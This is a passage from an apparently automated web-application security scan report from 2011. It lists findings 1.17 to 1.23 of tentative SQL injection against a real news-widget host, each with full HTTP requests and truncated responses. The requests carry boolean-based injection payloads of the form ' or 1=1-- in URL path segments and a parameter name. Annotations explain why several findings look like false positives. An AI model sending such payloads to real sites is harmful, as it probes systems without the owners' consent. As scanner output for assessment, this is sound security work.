   <link rel="icon" href="/image/favicon.png" type="image/png"/>
   <!--[if IE 6]>
   <link rel="stylesheet" media="screen" href="/stylesheets/mozo-ie6.css" />
   <![endif]-->
   <!--[if IE 7]>
   <link rel="stylesheet" media="screen" href="/stylesheets/mozo-ie7.css" />
   <![endif]-->
   <!--[if IE 8]>
   <link rel="stylesheet" media="screen" href="/stylesheets/mozo-ie8.css" />
   <![endif]-->
   <link href="/stylesheets/radius.css?1304318891" media="screen" rel="stylesheet" type="text/css" />
   <!--<link rel="stylesheet" media="screen" href="/stylesheets/radius.css" />-->

   <script type="text/javascript">
       var domainContext = 'mozo';
       var wallet = [['credit_cards', [], []], ['debit_cards', [], []], ['personal_loans', [], []], ['car_loans', [], []], ['home_loans', [], []],
...[SNIP]...

1.17. http://mozo-widgets.f2.com.au/widgets/multiwidget3/TA/FM-NEWS [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://mozo-widgets.f2.com.au
Path:   /widgets/multiwidget3/TA/FM-NEWS

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 99172217'%20or%201%3d1--%20 and 99172217'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present. The responses follow the pattern noted under 1.15: a bare Apache 403 without application headers for the 1=1 payload, and the Passenger-hosted application's 200 widget page for the 1=2 payload, so the two requests were not handled by the same code.

Request 1

GET /widgets/multiwidget3/TA99172217'%20or%201%3d1--%20/FM-NEWS HTTP/1.1
Host: mozo-widgets.f2.com.au
Proxy-Connection: keep-alive
Referer: http://www.theage.com.au/national/christmas-island-action-adds-to-villawood-woes-20110425-1du6x.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 403 Forbidden
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 02 May 2011 12:46:27 GMT
Connection: close
Content-Length: 252

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /widgets/multiwidget3/TA99172217' or 1=1-- /FM-NEWS
on this server.</p>
</body></html>

Request 2

GET /widgets/multiwidget3/TA99172217'%20or%201%3d2--%20/FM-NEWS HTTP/1.1
Host: mozo-widgets.f2.com.au
Proxy-Connection: keep-alive
Referer: http://www.theage.com.au/national/christmas-island-action-adds-to-villawood-woes-20110425-1du6x.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15
X-Runtime: 0.03963
ETag: "5b4aa92de6e82aba561068d98e1e5f96"
Status: 200 OK
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Cache-Control: private, must-revalidate, max-age=0
Date: Mon, 02 May 2011 12:46:27 GMT
Connection: close
Content-Length: 98246

<!DOCTYPE html>
<html lang="en">
<head>
   <meta charset="utf-8" />
   <title></title>
   <style type="text/css">
   /*********************** * * Eric Meyer reset 15 Jan 2008 * ***********************/ html, body, div, span, applet, object, iframe, h1, h2, h3, h4, h5, h6, p, blockquote, pre, a, abbr, acronym, address, big, cite, code, del, dfn, em, font, img, ins, kbd, q, s, samp, small, strike, strong, sub, sup, tt, var, b, u, i, center, dl, dt, dd, ol, ul, li, fieldset, form, label, legend, table, caption, tbody, tfoot, thead, tr, th, td {margin: 0; padding: 0; border: 0; outline: 0; font-size: 100%; vertical-align: baseline; background: transparent}
body {line-height: 1}
ol, ul {list-style: none}
blockquote, q {quotes: none}
/* remember to define focus styles! */ :focus {outline: 0}
/* remember to highlight inserts somehow! */ ins {text-decoration: none}
del {text-decoration: line-through}
/* tables still need 'cellspacing="0"' in the markup */ table {border-collapse: collapse; border-spacing: 0}
/* ** ** Multi-widget styles ** */ #multiwidget {width:300px;background:#fff;font-family:helvetica;margin:0px auto;text-align:center;}
h1 {padding:5px;margin:0;color:#333;font-size:18px;background-color:#c5e60e;color:#555;}
.curve-tr-25 {-webkit-border-top-right-radius:25px;-moz-border-radius-topright:25px;border-top-right-radius:25px;}
#activity-indicator {margin:100px 0 0 0;}
h4 {width:74px;height:28px;background-color:#cc3000;color:#fff;font-size:12px;}
h3 {height:25px;display:block;}
h3 a {display:block;height:15px;width:80px;background: transparent url(/images/sprite-png-domainwidget.png) no-repeat -150px -60px;float:righ
...[SNIP]...

1.18. http://mozo-widgets.f2.com.au/widgets/multiwidget3/TA/FM-NEWS [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://mozo-widgets.f2.com.au
Path:   /widgets/multiwidget3/TA/FM-NEWS

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 19292364'%20or%201%3d1--%20 and 19292364'%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present. The responses follow the pattern noted under 1.15: a bare Apache 403 without application headers for the 1=1 payload, and a 500 from the Passenger-hosted application for the 1=2 payload. The 500 deserves a look in its own right, but it cannot be read against the 403, because the 1=1 request never reached the application.

Request 1

GET /widgets/multiwidget3/TA/FM-NEWS19292364'%20or%201%3d1--%20 HTTP/1.1
Host: mozo-widgets.f2.com.au
Proxy-Connection: keep-alive
Referer: http://www.theage.com.au/national/christmas-island-action-adds-to-villawood-woes-20110425-1du6x.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 403 Forbidden
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 02 May 2011 12:46:56 GMT
Connection: close
Content-Length: 252

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /widgets/multiwidget3/TA/FM-NEWS19292364' or 1=1--
on this server.</p>
</body></html>

Request 2

GET /widgets/multiwidget3/TA/FM-NEWS19292364'%20or%201%3d2--%20 HTTP/1.1
Host: mozo-widgets.f2.com.au
Proxy-Connection: keep-alive
Referer: http://www.theage.com.au/national/christmas-island-action-adds-to-villawood-woes-20110425-1du6x.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 500 Internal Server Error
Server: Apache
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15
Status: 500
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Date: Mon, 02 May 2011 12:46:56 GMT
Connection: close
Content-Length: 75448

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<script type="text/javascript">
if (((document.domain.indexOf("smh.com.au") != -1) || (document.domain.indexOf("theage.com.au") != -1) ||
(document.domain.indexOf("watoday.com.au") != -1) ||
(document.domain.indexOf("brisbanetimes.com.au") != -1) ||
(document.domain.indexOf("businessday.com.au") != -1)) && (isSmartPhone()) &&
(document.cookie.indexOf("iphone_redirect=false") == -1)) {
var currentLocation = document.location.href;
if (currentLocation.indexOf("www.") != -1) {
currentLocation = currentLocation.replace("www.", "m.");
window.location = currentLocation;
}
}

/**
* Returns a <code>Boolean</code> indicating whether or not the user agent represents a smart phone.
*
* @return True if the user agent represents a smart phone; otherwise false.
*/
function isSmartPhone() {
var userAgent = navigator.userAgent
return ((matchesSmartPhoneUserAgentRegularExpressions(userAgent)) &&
(!matchesTabletUserAgentRegularExpressions(userAgent)));
}

/**
* Returns a <code>Boolean</code> indicating whether or not the specified user agent represents a smart phone.
* If any of the regular expressions are updated then they should be updated in
* <code>SmartPhoneHelper.java</code>.

...[SNIP]...

1.19. http://mozo-widgets.f2.com.au/widgets/multiwidget3/TA/FM-NEWS [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://mozo-widgets.f2.com.au
Path:   /widgets/multiwidget3/TA/FM-NEWS

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 31488663%20or%201%3d1--%20 and 31488663%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present. Here the 1=1 payload in the parameter name drew an Apache 403, while the 1=2 payload drew a 200 whose headers (Last-Modified, Accept-Ranges, an Apache-style ETag, no X-Powered-By) are consistent with Apache serving the widget page as a static file. If the page is static, the query string is never seen by application code, let alone by a database.

Request 1

GET /widgets/multiwidget3/TA/FM-NEWS?131488663%20or%201%3d1--%20=1 HTTP/1.1
Host: mozo-widgets.f2.com.au
Proxy-Connection: keep-alive
Referer: http://www.theage.com.au/national/christmas-island-action-adds-to-villawood-woes-20110425-1du6x.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 403 Forbidden
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 02 May 2011 12:45:34 GMT
Connection: close
Content-Length: 233

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /widgets/multiwidget3/TA/FM-NEWS
on this server.</p>
</body></html>

Request 2

GET /widgets/multiwidget3/TA/FM-NEWS?131488663%20or%201%3d2--%20=1 HTTP/1.1
Host: mozo-widgets.f2.com.au
Proxy-Connection: keep-alive
Referer: http://www.theage.com.au/national/christmas-island-action-adds-to-villawood-woes-20110425-1du6x.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 02 May 2011 11:50:25 GMT
ETag: "17c8024-17eeb-a10ae240"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Type: text/html
Date: Mon, 02 May 2011 12:45:34 GMT
Connection: close
Content-Length: 98027

<!DOCTYPE html>
<html lang="en">
<head>
   <meta charset="utf-8" />
   <title></title>
   <style type="text/css">
   /*********************** * * Eric Meyer reset 15 Jan 2008 * ***********************/ html, body, div, span, applet, object, iframe, h1, h2, h3, h4, h5, h6, p, blockquote, pre, a, abbr, acronym, address, big, cite, code, del, dfn, em, font, img, ins, kbd, q, s, samp, small, strike, strong, sub, sup, tt, var, b, u, i, center, dl, dt, dd, ol, ul, li, fieldset, form, label, legend, table, caption, tbody, tfoot, thead, tr, th, td {margin: 0; padding: 0; border: 0; outline: 0; font-size: 100%; vertical-align: baseline; background: transparent}
body {line-height: 1}
ol, ul {list-style: none}
blockquote, q {quotes: none}
/* remember to define focus styles! */ :focus {outline: 0}
/* remember to highlight inserts somehow! */ ins {text-decoration: none}
del {text-decoration: line-through}
/* tables still need 'cellspacing="0"' in the markup */ table {border-collapse: collapse; border-spacing: 0}
/* ** ** Multi-widget styles ** */ #multiwidget {width:300px;background:#fff;font-family:helvetica;margin:0px auto;text-align:center;}
h1 {padding:5px;margin:0;color:#333;font-size:18px;background-color:#c5e60e;color:#555;}
.curve-tr-25 {-webkit-border-top-right-radius:25px;-moz-border-radius-topright:25px;border-top-right-radius:25px;}
#activity-indicator {margin:100px 0 0 0;}
h4 {width:74px;height:28px;background-color:#cc3000;color:#fff;font-size:12px;}
h3 {height:25px;display:block;}
h3 a {display:block;height:15px;width:80px;background: transparent url(/images/sprite-png-domainwidget.png) no-repeat -150px -60px;float:right;text-indent:-999em;}
ul.tabs {margin:0;padding:0;overflow:hidden;background-color:#c5e60e;}
ul.tabs li {
...[SNIP]...

1.20. http://mozo-widgets.f2.com.au/widgets/multiwidget3/WAT/FM-NEWS [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://mozo-widgets.f2.com.au
Path:   /widgets/multiwidget3/WAT/FM-NEWS

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 16009845'%20or%201%3d1--%20 and 16009845'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present. The responses follow the pattern noted under 1.15: a bare Apache 403 without application headers for the 1=1 payload, and the Passenger-hosted application's 404 page for the 1=2 payload, so the two requests were not handled by the same code.

Request 1

GET /widgets16009845'%20or%201%3d1--%20/multiwidget3/WAT/FM-NEWS HTTP/1.1
Host: mozo-widgets.f2.com.au
Proxy-Connection: keep-alive
Referer: http://www.watoday.com.au/wa-news/hunger-strike-starts-on-christmas-island-20110427-1dw45.html?from=smh_ft
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 403 Forbidden
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 02 May 2011 12:46:41 GMT
Connection: close
Content-Length: 253

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /widgets16009845' or 1=1-- /multiwidget3/WAT/FM-NEWS
on this server.</p>
</body></html>

Request 2

GET /widgets16009845'%20or%201%3d2--%20/multiwidget3/WAT/FM-NEWS HTTP/1.1
Host: mozo-widgets.f2.com.au
Proxy-Connection: keep-alive
Referer: http://www.watoday.com.au/wa-news/hunger-strike-starts-on-christmas-island-20110427-1dw45.html?from=smh_ft
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15
X-Runtime: 0.02570
Status: 404
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Date: Mon, 02 May 2011 12:46:42 GMT
Connection: close
Content-Length: 36120

<!DOCTYPE html>
<html lang="en">
<head>
   <meta charset="utf-8" />
   <meta name="keywords" content="Mozo, money info zone, information, bank reviews"/><meta name="description" content="Find products by provider with Mozo. Read reviews about providers, or write your own review about provider."/><title>Mozo - Compare Credit Cards, Home Loans, Term Deposits and more</title>
   <meta name="robots" content="noydir" />
   <meta name="robots" content="noodp" />
       <link rel="canonical" href="http://mozo.com.au/widgets16009845' or 1=2-- /multiwidget3/WAT/FM-NEWS">
   
   <script type="text/javascript">
           var logged_in = false;
           var searchType = '';
       //var providerNames; // = [];
   </script>

   

   
   <script src="/javascripts/base_8604.js?1304318891" type="text/javascript"></script>    


   
   
   <link href="/stylesheets/base_8603.css" media="screen" rel="Stylesheet" type="text/css" />
   
   
   <link rel="shortcut icon" href="/favicon.icon" type="image/vnd.microsoft.icon"/>
   <link rel="icon" href="/image/favicon.png" type="image/png"/>
   <!--[if IE 6]>
   <link rel="stylesheet" media="screen" href="/stylesheets/mozo-ie6.css" />
   <![endif]-->
   <!--[if IE 7]>
   <link rel="stylesheet" media="screen" href="/stylesheets/mozo-ie7.css" />
   <![endif]-->
   <!--[if IE 8]>
   <link rel="stylesheet" media="screen" href="/stylesheets/mozo-ie8.css" />
   <![endif]-->
   <link href="/stylesheets/radius.css?1304318891" media="screen" rel="stylesheet" type="text/css" />
   <!--<link rel="stylesheet" media="screen" href="/stylesheets/radius.css" />-->

   <script type="text/javascript">
       var domainContext = 'mozo';
       var wallet = [['credit_cards', [], []], ['debit_cards', [], []], ['personal_loans', [], []], ['car_loans', [], []], ['h
...[SNIP]...

1.21. http://mozo-widgets.f2.com.au/widgets/multiwidget3/WAT/FM-NEWS [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://mozo-widgets.f2.com.au
Path:   /widgets/multiwidget3/WAT/FM-NEWS

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 80339781'%20or%201%3d1--%20 and 80339781'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present. The responses follow the pattern noted under 1.15: a bare Apache 403 without application headers for the 1=1 payload, and the Passenger-hosted application's 404 page for the 1=2 payload, so the two requests were not handled by the same code.

Request 1

GET /widgets/multiwidget380339781'%20or%201%3d1--%20/WAT/FM-NEWS HTTP/1.1
Host: mozo-widgets.f2.com.au
Proxy-Connection: keep-alive
Referer: http://www.watoday.com.au/wa-news/hunger-strike-starts-on-christmas-island-20110427-1dw45.html?from=smh_ft
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 403 Forbidden
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 02 May 2011 12:46:58 GMT
Connection: close
Content-Length: 253

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /widgets/multiwidget380339781' or 1=1-- /WAT/FM-NEWS
on this server.</p>
</body></html>

Request 2

GET /widgets/multiwidget380339781'%20or%201%3d2--%20/WAT/FM-NEWS HTTP/1.1
Host: mozo-widgets.f2.com.au
Proxy-Connection: keep-alive
Referer: http://www.watoday.com.au/wa-news/hunger-strike-starts-on-christmas-island-20110427-1dw45.html?from=smh_ft
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15
Status: 404
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Date: Mon, 02 May 2011 12:46:59 GMT
Connection: close
Content-Length: 36120

<!DOCTYPE html>
<html lang="en">
<head>
   <meta charset="utf-8" />
   <meta name="keywords" content="Mozo, money info zone, information, bank reviews"/><meta name="description" content="Find products by provider with Mozo. Read reviews about providers, or write your own review about provider."/><title>Mozo - Compare Credit Cards, Home Loans, Term Deposits and more</title>
   <meta name="robots" content="noydir" />
   <meta name="robots" content="noodp" />
       <link rel="canonical" href="http://mozo.com.au/widgets/multiwidget380339781' or 1=2-- /WAT/FM-NEWS">
   
   <script type="text/javascript">
           var logged_in = false;
           var searchType = '';
       //var providerNames; // = [];
   </script>

   

   
   <script src="/javascripts/base_8604.js?1304318891" type="text/javascript"></script>    


   
   
   <link href="/stylesheets/base_8603.css" media="screen" rel="Stylesheet" type="text/css" />
   
   
   <link rel="shortcut icon" href="/favicon.icon" type="image/vnd.microsoft.icon"/>
   <link rel="icon" href="/image/favicon.png" type="image/png"/>
   <!--[if IE 6]>
   <link rel="stylesheet" media="screen" href="/stylesheets/mozo-ie6.css" />
   <![endif]-->
   <!--[if IE 7]>
   <link rel="stylesheet" media="screen" href="/stylesheets/mozo-ie7.css" />
   <![endif]-->
   <!--[if IE 8]>
   <link rel="stylesheet" media="screen" href="/stylesheets/mozo-ie8.css" />
   <![endif]-->
   <link href="/stylesheets/radius.css?1304318891" media="screen" rel="stylesheet" type="text/css" />
   <!--<link rel="stylesheet" media="screen" href="/stylesheets/radius.css" />-->

   <script type="text/javascript">
       var domainContext = 'mozo';
       var wallet = [['credit_cards', [], []], ['debit_cards', [], []], ['personal_loans', [], []], ['car_loans', [], []], ['home_loans', [], []],
...[SNIP]...

1.22. http://mozo-widgets.f2.com.au/widgets/multiwidget3/WAT/FM-NEWS [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://mozo-widgets.f2.com.au
Path:   /widgets/multiwidget3/WAT/FM-NEWS

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 12878514'%20or%201%3d1--%20 and 12878514'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /widgets/multiwidget3/WAT12878514'%20or%201%3d1--%20/FM-NEWS HTTP/1.1
Host: mozo-widgets.f2.com.au
Proxy-Connection: keep-alive
Referer: http://www.watoday.com.au/wa-news/hunger-strike-starts-on-christmas-island-20110427-1dw45.html?from=smh_ft
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 403 Forbidden
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 02 May 2011 12:47:12 GMT
Connection: close
Content-Length: 253

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /widgets/multiwidget3/WAT12878514' or 1=1-- /FM-NEWS
on this server.</p>
</body></html>

Request 2

GET /widgets/multiwidget3/WAT12878514'%20or%201%3d2--%20/FM-NEWS HTTP/1.1
Host: mozo-widgets.f2.com.au
Proxy-Connection: keep-alive
Referer: http://www.watoday.com.au/wa-news/hunger-strike-starts-on-christmas-island-20110427-1dw45.html?from=smh_ft
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15
X-Runtime: 0.04091
ETag: "c75d435ba4c28ba01dac0272b2847b01"
Status: 200 OK
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Cache-Control: private, must-revalidate, max-age=0
Date: Mon, 02 May 2011 12:47:12 GMT
Connection: close
Content-Length: 98258

<!DOCTYPE html>
<html lang="en">
<head>
   <meta charset="utf-8" />
   <title></title>
   <style type="text/css">
   /*********************** * * Eric Meyer reset 15 Jan 2008 * ***********************/ html, body, div, span, applet, object, iframe, h1, h2, h3, h4, h5, h6, p, blockquote, pre, a, abbr, acronym, address, big, cite, code, del, dfn, em, font, img, ins, kbd, q, s, samp, small, strike, strong, sub, sup, tt, var, b, u, i, center, dl, dt, dd, ol, ul, li, fieldset, form, label, legend, table, caption, tbody, tfoot, thead, tr, th, td {margin: 0; padding: 0; border: 0; outline: 0; font-size: 100%; vertical-align: baseline; background: transparent}
body {line-height: 1}
ol, ul {list-style: none}
blockquote, q {quotes: none}
/* remember to define focus styles! */ :focus {outline: 0}
/* remember to highlight inserts somehow! */ ins {text-decoration: none}
del {text-decoration: line-through}
/* tables still need 'cellspacing="0"' in the markup */ table {border-collapse: collapse; border-spacing: 0}
/* ** ** Multi-widget styles ** */ #multiwidget {width:300px;background:#fff;font-family:helvetica;margin:0px auto;text-align:center;}
h1 {padding:5px;margin:0;color:#333;font-size:18px;background-color:#c5e60e;color:#555;}
.curve-tr-25 {-webkit-border-top-right-radius:25px;-moz-border-radius-topright:25px;border-top-right-radius:25px;}
#activity-indicator {margin:100px 0 0 0;}
h4 {width:74px;height:28px;background-color:#cc3000;color:#fff;font-size:12px;}
h3 {height:25px;display:block;}
h3 a {display:block;height:15px;width:80px;background: transparent url(/images/sprite-png-domainwidget.png) no-repeat -150px -60px;float:righ
...[SNIP]...

1.23. http://mozo-widgets.f2.com.au/widgets/multiwidget3/WAT/FM-NEWS [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://mozo-widgets.f2.com.au
Path:   /widgets/multiwidget3/WAT/FM-NEWS

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 67737725'%20or%201%3d1--%20 and 67737725'%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /widgets/multiwidget3/WAT/FM-NEWS67737725'%20or%201%3d1--%20 HTTP/1.1
Host: mozo-widgets.f2.com.au
Proxy-Connection: keep-alive
Referer: http://www.watoday.com.au/wa-news/hunger-strike-starts-on-christmas-island-20110427-1dw45.html?from=smh_ft
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 403 Forbidden
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 02 May 2011 12:47:32 GMT
Connection: close
Content-Length: 253

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /widgets/multiwidget3/WAT/FM-NEWS67737725' or 1=1--
on this server.</p>
